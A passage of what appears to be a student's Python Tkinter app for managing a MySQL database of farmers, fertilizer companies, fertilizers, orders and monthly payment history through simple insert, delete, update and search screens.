font=(\"Arial\", 15),command=history)\n Button.place(x=200, y=400+25)\n\n#history\ndef history():\n global root,cur,db\n #clean previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n\n cur.execute(\"CALL getMonth(%s);\",[datetime.today().strftime(\"%m\")])\n data=cur.fetchall()\n \n label=Label(root,text=\"The Transaction History of this month\",font=(\"Arial\",15))\n label.place(x=200,y=20)\n\n button=Button(root,text='BACK',command=entity_page)\n button.place(x=20,y=20)\n\n frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')\n frame.place(x=10,y=100,width=750,height=400)\n\n x_scroll=Scrollbar(frame,orient=HORIZONTAL)\n y_scroll=Scrollbar(frame,orient=VERTICAL)\n\n table=ttk.Treeview(frame,columns=(\"trans_id\",'p_f_id','p_date','p_amount','p_method'),xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n\n x_scroll.pack(side=BOTTOM,fill=X)\n y_scroll.pack(side=RIGHT,fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id',text=\"Transaction Id\")\n table.heading('p_f_id',text=\"Farmer Id\")\n\n\n table.heading('p_date',text=\"Payment Date\")\n table.heading('p_amount',text=\"Amount\")\n table.heading('p_method',text=\"Payment Method\")\n #table.heading('f_address',text=\"Farmer Address\")\n table['show']='headings'\n\n #table.column(\"f_id\",width=100)\n\n\n table.pack()\n\n\n\n #cur.execute(\"SELECT * FROM payment;\")\n\n #data =cur.fetchall()\n #db.commit()\n if len(data)!=0:\n for row in data:\n table.insert('',END,values=row)\n\n db.close()\n db=mysql.connector.connect(host='localhost',user='root',passwd='bhushi',database='farmer_app')\n cur=db.cursor()\n \n\n\n#farmer page\ndef farmer():\n global root\n #clean previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Farmer Table',font=('Times new roman',15),bg='white')\n label.place(x=350,y=10)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=entity_page)\n Button.place(x=10, y=50)\n\n Button = tk.Button(root, text=\"Insert\", font=(\"Arial\", 15),command=insert_farmer)\n Button.place(x=110, y=50)\n\n Button = tk.Button(root, text=\"Delete\", font=(\"Arial\", 15),command=delete_farmer)\n Button.place(x=210, y=50)\n\n Button = tk.Button(root, text=\"Update\", font=(\"Arial\", 15),command=update_farmer)\n Button.place(x=310, y=50)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_farmer)\n Button.place(x=410, y=50)\n\n view_farmer()\n\n\ndef view_farmer():\n frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')\n frame.place(x=10,y=100,width=750,height=400)\n\n x_scroll=Scrollbar(frame,orient=HORIZONTAL)\n y_scroll=Scrollbar(frame,orient=VERTICAL)\n\n table=ttk.Treeview(frame,columns=(\"f_id\",'f_name','f_phone','f_mail','f_locality','f_address'),xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n\n x_scroll.pack(side=BOTTOM,fill=X)\n y_scroll.pack(side=RIGHT,fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('f_id',text=\"Farmer Id\")\n table.heading('f_name',text=\"Farmer Name\")\n table.heading('f_phone',text=\"Farmer Phone\")\n table.heading('f_mail',text=\"Farmer Mail\")\n table.heading('f_locality',text=\"Farmer Locality\")\n table.heading('f_address',text=\"Farmer Address\")\n table['show']='headings'\n\n table.column(\"f_id\",width=100)\n\n\n table.pack()\n\n\n\n cur.execute(\"SELECT * FROM farmer;\")\n\n data =cur.fetchall()\n db.commit()\n if len(data)!=0:\n for row in data:\n table.insert('',END,values=row)\n\ne1,e2,e3,e4,e5,e6=0,0,0,0,0,0\ndef insert_farmer():\n global e1,e2,e3,e4,e5,e6\n #clean the window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n\n #create the window\n label=Label(root,text='Farmer_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Farmer_name',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Farmer_phone',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Farmer_mail',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Farmer_locality',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n label=Label(root,text='Farmer_address',font=('Times new roman',20),bg='white')\n label.place(x=50,y=270)\n\n e1=Entry(root,width=50)\n e2=Entry(root,width=50)\n e3=Entry(root,width=50)\n e4=Entry(root,width=50)\n e5=Entry(root,width=50)\n e6=Entry(root,width=50)\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n e3.place(x=350,y=110)\n e4.place(x=350,y=160)\n e5.place(x=350,y=210)\n e6.place(x=350,y=270)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=farmer)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=insert_farmer_command)\n Button.place(x=400, y=400)\n\ndef insert_farmer_command():\n global root\n try:\n sql=\"INSERT INTO farmer values(%s,%s,%s,%s,%s,%s);\"\n if len(e1.get())>3:\n invalid('farmer')\n else:\n\n vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get(),e6.get()\n cur.executemany(sql,[vals])\n db.commit()\n farmer()\n except:\n insert_farmer()\ndef invalid(page):\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n if page=='farmer':\n label=Label(root,text='Enter valid farmer_id',font=('Times new roman',30),bg='white')\n label.place(x=170,y=200)\n\n button=Button(root,text='Re-enter',font=('Times new roman',20),command=insert_farmer)\n button.place(x=300,y=400)\n elif page=='company':\n label=Label(root,text='Enter valid company_id',font=('Times new roman',30),bg='white')\n label.place(x=170,y=200)\n\n button=Button(root,text='Re-enter',font=('Times new roman',20),command=insert_company)\n button.place(x=300,y=400)\ndef delete_farmer():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Farmer Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=farmer)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=delete_farmer_command)\n Button.place(x=400, y=400)\n\n\ndef delete_farmer_command():\n try:\n sql=\"DELETE FROM farmer WHERE f_id=%s;\"\n cur.execute(sql,[e1.get()])\n db.commit()\n farmer()\n except:\n l=Label(root,text='Invalid Entry',font=('times new roman',15))\n l.place(x=100,y=300)\n\ndef update_farmer():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Farmer Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=update)\n\n Button.place(x=300, y=400)\n\ndef update():\n try:\n global e1,e2,e3,e4,e5,e6\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n sql='SELECT * FROM farmer WHERE f_id=%s;'\n vals=[e1.get()]\n cur.execute(sql,vals)\n\n label=Label(root,text='Farmer_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Farmer_name',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Farmer_phone',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Farmer_mail',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Farmer_locality',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n label=Label(root,text='Farmer_address',font=('Times new roman',20),bg='white')\n label.place(x=50,y=270)\n\n e1=Entry(root)\n e2=Entry(root)\n e3=Entry(root)\n e4=Entry(root)\n e5=Entry(root)\n e6=Entry(root)\n\n data=cur.fetchall()\n arr=[e1,e2,e3,e4,e5,e6]\n count=0\n for val in data[0]:\n arr[count].insert(0,val)\n count+=1\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n e3.place(x=350,y=110)\n e4.place(x=350,y=160)\n e5.place(x=350,y=210)\n e6.place(x=350,y=270)\n\n label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command)\n label.place(x=300,y=400)\n\n\n except:\n l=Label(root,text='Invalid Farmer_id',font=('times new roman',15))\n l.place(x=100,y=300)\n update_farmer()\n\ndef update_command():\n try:\n sql=\"UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;\"\n vals=e2.get(),e3.get(),e4.get(),e5.get(),e6.get(),e1.get()\n cur.executemany(sql,[vals])\n db.commit()\n farmer()\n except:\n update_farmer()\ndef search_farmer():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Farmer Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=farmer)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search)\n Button.place(x=400, y=400)\ndef search():\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n try:\n sql='SELECT * FROM farmer WHERE f_id=%s;'\n val=[e1.get()]\n cur.execute(sql,val)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=farmer)\n Button.place(x=300, y=400)\n\n for val in cur:\n count=0\n Y=50\n names=['farmer id: ','farmer name: ','farmer phone: ','farmer mail: ','farmer locality: ','farmer address: ']\n for i in val:\n label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')\n label.place(x=10,y=Y)\n Y+=50\n count+=1\n db.commit()\n except:\n l=Label(root,text='Invalid Farmer Id',font=('times new roman',15))\n l.place(x=100,y=300)\n search_farmer()\n\n\n#company page\ndef company():\n global root\n #clean previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Company Table',font=('Times new roman',15),bg='white')\n label.place(x=350,y=10)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=entity_page)\n Button.place(x=10, y=50)\n\n Button = tk.Button(root, text=\"Insert\", font=(\"Arial\", 15),command=insert_company)\n Button.place(x=110, y=50)\n\n Button = tk.Button(root, text=\"Delete\", font=(\"Arial\", 15),command=delete_company)\n Button.place(x=210, y=50)\n\n Button = tk.Button(root, text=\"Update\", font=(\"Arial\", 15),command=update_company)\n Button.place(x=310, y=50)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_company)\n Button.place(x=410, y=50)\n\n view_company()\n\n\ndef view_company():\n frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')\n frame.place(x=10,y=100,width=750,height=400)\n\n x_scroll=Scrollbar(frame,orient=HORIZONTAL)\n y_scroll=Scrollbar(frame,orient=VERTICAL)\n\n table=ttk.Treeview(frame,columns=(\"c_id\",'c_name','c_address'),xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n\n x_scroll.pack(side=BOTTOM,fill=X)\n y_scroll.pack(side=RIGHT,fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('c_id',text=\"Company Id\")\n table.heading('c_name',text=\"Company Name\")\n table.heading('c_address',text=\"Company Address\")\n table['show']='headings'\n\n table.column(\"c_id\",width=100)\n\n\n table.pack()\n\n\n\n cur.execute(\"SELECT * FROM company;\")\n\n data =cur.fetchall()\n db.commit()\n if len(data)!=0:\n for row in data:\n table.insert('',END,values=row)\n\ndef insert_company():\n global e1,e2,e3,e4,e5,e6\n #clean the window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n\n #create the window\n label=Label(root,text='Company_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Company_name',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Company_address',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n e1=Entry(root,width=50)\n e2=Entry(root,width=50)\n e3=Entry(root,width=50)\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=110)\n e3.place(x=350,y=210)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=company)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=insert_company_command)\n Button.place(x=400, y=400)\n\ndef insert_company_command():\n try:\n if len(e1.get())>3:\n invalid(\"company\")\n else:\n sql=\"INSERT INTO company values(%s,%s,%s);\"\n vals=e1.get(),e2.get(),e3.get()\n cur.executemany(sql,[vals])\n db.commit()\n company()\n except:\n insert_company()\ndef delete_company():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Company Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=company)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=delete_company_command)\n Button.place(x=400, y=400)\n\n\ndef delete_company_command():\n try:\n sql=\"DELETE FROM company WHERE c_id=%s;\"\n cur.execute(sql,[int(e1.get())])\n db.commit()\n company()\n except:\n l=Label(root,text='Invalid Entry',font=('times new roman',15))\n l.place(x=100,y=300)\n\ndef update_company():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Company Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=update_c)\n\n Button.place(x=300, y=400)\n\ndef update_c():\n try:\n global e1,e2,e3,e4,e5,e6\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n sql='SELECT * FROM company WHERE c_id=%s;'\n vals=[e1.get()]\n cur.execute(sql,vals)\n\n label=Label(root,text='Company_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Company_name',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Company_address',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n e1=Entry(root)\n e2=Entry(root)\n e3=Entry(root)\n\n data=cur.fetchall()\n arr=[e1,e2,e3]\n count=0\n for val in data[0]:\n arr[count].insert(0,val)\n count+=1\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=110)\n e3.place(x=350,y=210)\n\n label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_c)\n label.place(x=300,y=400)\n\n\n except:\n l=Label(root,text='Invalid Farmer_id',font=('times new roman',15))\n l.place(x=100,y=300)\n update_company()\n\ndef update_command_c():\n try:\n sql=\"UPDATE company SET c_name=%s,c_address=%s WHERE c_id=%s;\"\n vals=e2.get(),e3.get(),e1.get()\n cur.executemany(sql,[vals])\n db.commit()\n company()\n except:\n update_company()\ndef search_company():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Company Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=company)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_c)\n Button.place(x=400, y=400)\ndef search_c():\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n try:\n sql='SELECT * FROM company WHERE c_id=%s;'\n val=[e1.get()]\n cur.execute(sql,val)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=company)\n Button.place(x=300, y=400)\n\n for val in cur:\n count=0\n Y=50\n names=['company id: ','company name: ','company address: ']\n for i in val:\n label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')\n label.place(x=10,y=Y)\n Y+=50\n count+=1\n db.commit()\n except:\n l=Label(root,text='Invalid Company Id',font=('times new roman',15))\n l.place(x=100,y=300)\n search_company()\n\n\n\n#fertilizer page\ndef fertilizer():\n global root\n #clean previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Fertilizer Table',font=('Times new roman',15),bg='white')\n label.place(x=350,y=10)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=entity_page)\n Button.place(x=10, y=50)\n\n Button = tk.Button(root, text=\"Insert\", font=(\"Arial\", 15),command=insert_fer)\n Button.place(x=110, y=50)\n\n Button = tk.Button(root, text=\"Delete\", font=(\"Arial\", 15),command=delete_fer)\n Button.place(x=210, y=50)\n\n Button = tk.Button(root, text=\"Update\", font=(\"Arial\", 15),command=update_fer)\n Button.place(x=310, y=50)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_fer)\n Button.place(x=410, y=50)\n\n view_fer()\n\n\ndef view_fer():\n frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')\n frame.place(x=10,y=100,width=750,height=400)\n\n x_scroll=Scrollbar(frame,orient=HORIZONTAL)\n y_scroll=Scrollbar(frame,orient=VERTICAL)\n\n table=ttk.Treeview(frame,columns=(\"fe_formula\",'fe_name','fe_content','fe_price','company_id'),xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n\n x_scroll.pack(side=BOTTOM,fill=X)\n y_scroll.pack(side=RIGHT,fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('fe_formula',text=\"Fertilizer Formula\")\n table.heading('fe_name',text=\"Fertilizer name\")\n table.heading('fe_content',text=\"Fertilizer content\")\n table.heading('fe_price',text=\"Fertilizer price\")\n table.heading('company_id',text=\"Company_id\")\n #table.heading('f_address',text=\"Farmer Address\")\n table['show']='headings'\n\n #table.column(\"f_id\",width=100)\n\n\n table.pack()\n\n\n\n cur.execute(\"SELECT * FROM fertilizer;\")\n\n data =cur.fetchall()\n db.commit()\n if len(data)!=0:\n for row in data:\n table.insert('',END,values=row)\n\ne1,e2,e3,e4,e5,e6=0,0,0,0,0,0\ndef insert_fer():\n global e1,e2,e3,e4,e5,e6\n #clean the window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n\n #create the window\n label=Label(root,text='Fertlizer formula',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Fertlizer name',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Fertilizer content',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Fertlizer price',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Company id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n\n e1=Entry(root,width=50)\n e2=Entry(root,width=50)\n e3=Entry(root,width=50)\n e4=Entry(root,width=50)\n e5=Entry(root,width=50)\n #e6=Entry(root,width=50)\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n e3.place(x=350,y=110)\n e4.place(x=350,y=160)\n e5.place(x=350,y=210)\n #e6.place(x=350,y=270)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=fertilizer)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=insert_fer_command)\n Button.place(x=400, y=400)\n\ndef insert_fer_command():\n try:\n sql=\"INSERT INTO fertilizer values(%s,%s,%s,%s,%s);\"\n vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get()\n cur.executemany(sql,[vals])\n db.commit()\n fertilizer()\n except:\n insert_fer()\ndef delete_fer():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Fertilizer formula:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=fertilizer)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=delete_fer_command)\n Button.place(x=400, y=400)\n\n\ndef delete_fer_command():\n try:\n sql=\"DELETE FROM fertilizer WHERE fe_formula=%s;\"\n cur.execute(sql,[e1.get()])\n db.commit()\n fertilizer()\n except:\n l=Label(root,text='Invalid Entry',font=('times new roman',15))\n l.place(x=100,y=300)\n\ndef update_fer():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Fertlizer formula:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=update_fe)\n\n Button.place(x=300, y=400)\n\ndef update_fe():\n try:\n global e1,e2,e3,e4,e5,e6\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n sql='SELECT * FROM fertilizer WHERE fe_formula=%s;'\n vals=[e1.get()]\n cur.execute(sql,vals)\n\n label=Label(root,text='Fertlizer formula',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Fertlizer name',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Fertlizer content',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Fertlizer price',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='comapny_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n\n e1=Entry(root)\n e2=Entry(root)\n e3=Entry(root)\n e4=Entry(root)\n e5=Entry(root)\n #e6=Entry(root)\n\n data=cur.fetchall()\n arr=[e1,e2,e3,e4,e5,e6]\n count=0\n for val in data[0]:\n arr[count].insert(0,val)\n count+=1\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n e3.place(x=350,y=110)\n e4.place(x=350,y=160)\n e5.place(x=350,y=210)\n #e6.place(x=350,y=270)\n\n label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_fe)\n label.place(x=300,y=400)\n\n\n except:\n l=Label(root,text='Invalid Farmer_id',font=('times new roman',15))\n l.place(x=100,y=300)\n update_fer()\n\ndef update_command_fe():\n\n sql=\"UPDATE fertilizer SET fe_name=%s,fe_content=%s,fe_price=%s,company_id=%s WHERE fe_formula=%s;\"\n vals=e2.get(),e3.get(),e4.get(),e5.get(),e1.get()\n cur.executemany(sql,[vals])\n db.commit()\n fertilizer()\n\ndef search_fer():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Fertlizer formula:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=fertilizer)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_fe)\n Button.place(x=400, y=400)\ndef search_fe():\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n try:\n sql='SELECT * FROM fertilizer WHERE fe_formula=%s;'\n val=[e1.get()]\n cur.execute(sql,val)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=fertilizer)\n Button.place(x=300, y=400)\n\n for val in cur:\n count=0\n Y=50\n names=['fertilizer formula: ','fertilizer name: ','fertilizer content: ','fertilizer price: ','company_id: ']\n for i in val:\n label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')\n label.place(x=10,y=Y)\n Y+=50\n count+=1\n db.commit()\n except:\n l=Label(root,text='Invalid Fertilizer formula',font=('times new roman',15))\n l.place(x=100,y=300)\n search_fer()\n\n\n\n#order page\ndef orders():\n global root\n #clean previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Orders Table',font=('Times new roman',15),bg='white')\n label.place(x=350,y=10)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=entity_page)\n Button.place(x=10, y=50)\n\n Button = tk.Button(root, text=\"Insert\", font=(\"Arial\", 15),command=insert_ord)\n Button.place(x=110, y=50)\n\n Button = tk.Button(root, text=\"Delete\", font=(\"Arial\", 15),command=delete_ord)\n Button.place(x=210, y=50)\n\n Button = tk.Button(root, text=\"Update\", font=(\"Arial\", 15),command=update_ord)\n Button.place(x=310, y=50)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_ord)\n Button.place(x=410, y=50)\n\n view_ord()\n\n\ndef view_ord():\n frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')\n frame.place(x=10,y=100,width=750,height=400)\n\n x_scroll=Scrollbar(frame,orient=HORIZONTAL)\n y_scroll=Scrollbar(frame,orient=VERTICAL)\n\n table=ttk.Treeview(frame,columns=(\"or_id\",'or_date','or_fid','or_formula','or_to'),xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n\n x_scroll.pack(side=BOTTOM,fill=X)\n y_scroll.pack(side=RIGHT,fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('or_id',text=\"Order Id\")\n table.heading('or_date',text=\"Order Date\")\n\n\n table.heading('or_fid',text=\"Ordered Farmer Id\")\n table.heading('or_formula',text=\"Order (item)formula\")\n table.heading('or_to',text=\"Order to\")\n #table.heading('f_address',text=\"Farmer Address\")\n table['show']='headings'\n\n #table.column(\"f_id\",width=100)\n\n\n table.pack()\n\n\n\n cur.execute(\"SELECT * FROM orders;\")\n\n data =cur.fetchall()\n db.commit()\n if len(data)!=0:\n for row in data:\n table.insert('',END,values=row)\n\ne1,e2,e3,e4,e5,e6=0,0,0,0,0,0\ndef insert_ord():\n global e1,e2,e3,e4,e5,e6\n #clean the window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n\n #create the window\n label=Label(root,text='Order Id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Order date',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Order FID',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Order formula',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Order to',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n\n e1=Entry(root,width=50)\n e2=Entry(root,width=50)\n e3=Entry(root,width=50)\n e4=Entry(root,width=50)\n e5=Entry(root,width=50)\n #e6=Entry(root,width=50)\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n e2.insert(0,datetime.now())\n e3.place(x=350,y=110)\n e4.place(x=350,y=160)\n e5.place(x=350,y=210)\n #e6.place(x=350,y=270)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=orders)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=insert_ord_command)\n Button.place(x=400, y=400)\n\ndef insert_ord_command():\n try:\n sql=\"INSERT INTO orders values(%s,%s,%s,%s,%s);\"\n vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get()\n cur.executemany(sql,[vals])\n db.commit()\n orders()\n except:\n insert_ord()\ndef delete_ord():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Order Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=orders)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=delete_ord_command)\n Button.place(x=400, y=400)\n\n\ndef delete_ord_command():\n try:\n sql=\"DELETE FROM orders WHERE or_id=%s;\"\n cur.execute(sql,[e1.get()])\n db.commit()\n orders()\n except:\n l=Label(root,text='Invalid Entry',font=('times new roman',15))\n l.place(x=100,y=300)\n\ndef update_ord():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n 